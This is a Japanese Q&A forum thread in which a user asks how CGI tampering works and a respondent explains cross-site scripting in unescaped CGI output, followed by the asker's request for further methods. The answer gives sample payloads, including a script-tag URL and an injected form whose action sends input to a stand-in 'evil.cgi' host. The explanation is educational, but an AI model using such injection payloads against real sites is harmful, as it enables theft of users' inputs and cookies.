- 締切済み
CGI改竄について
よくCGI改竄などについて騒がれていますが 本当にその様なことが可能なのでしょうか? パスクラックなどは別としてどのような方法がとられるのでしょう ページ改竄と同じ仕組みだとパスクラックでしょうがCGI改竄もパスクラックなのでしょうか? 詳しく教えてください お願いします
- reitoumikan
- お礼率100% (1/1)
- ネットワーク
- 回答数1
- ありがとう数2
- みんなの回答 (1)
- 専門家の回答
みんなの回答
- annie_x
- ベストアンサー率50% (65/129)
クロスサイトスクリプティング(CSS)の脆弱性のことを言っていらっしゃるのではないでしょうか? CGIやCookieなどにより動的に生成されるページでは、受け取った文字列をページの中に埋め込むものが多くあります。その際、タグなどの特殊な文字を変換(e.g. <tag> は、<tag> と変換されるべき)しないと、悪意のあるスクリプト等をHTMLとして埋め込むことができます。また、ブラウザはこのHTMLを信頼できるものとして実行してしまいます。 例えば以下のようなQUERY_STRING を受け取った foo.cgi が、「<script>~</script>」の部分を変換せずにHTMLの中に表示させてしまったらどうなるでしょう。 http://server/cgi-bin/foo.cgi?<script>悪意あるコード</script> クライアントのブラウザでは、悪意あるコードが実行されてしまいます。また、この部分に 「</form><form action="http://foo.com/cgi-bin/evil.cgi">~」などと埋め込んだ場合は、信頼できるサイトで入力したはずの値が、悪意あるサイトに送信されてしまう可能性もあります。 これはほんの一例です。特に、cookie を利用している場合は、その値が第三者に漏洩する可能性があり、非常に危険です。 詳細は参考URLなどを参照してみてください。 外していなければ良いのですが。
お礼
ご回答ありがとうございました その一例は知って(?)いました ただ、変換しないCGIを使っているサイトなど現在ほとんど無いと思います 例えばソースを表示したりブラクラ化したとしてCGIの改竄と言うことになるのですか? その一例以外になにか方法があるようなことを書いてらっしゃいますが どのようなことがあるのでしょう 出来れば教えていただきたいです 補足いたしますが私は主に掲示板のCGIのことについての話を聞きたいです もしかしたら私の理解力が足らず 全然見当はずれな事を言っているかもしれません そしたらすいません よろしくお願いいたします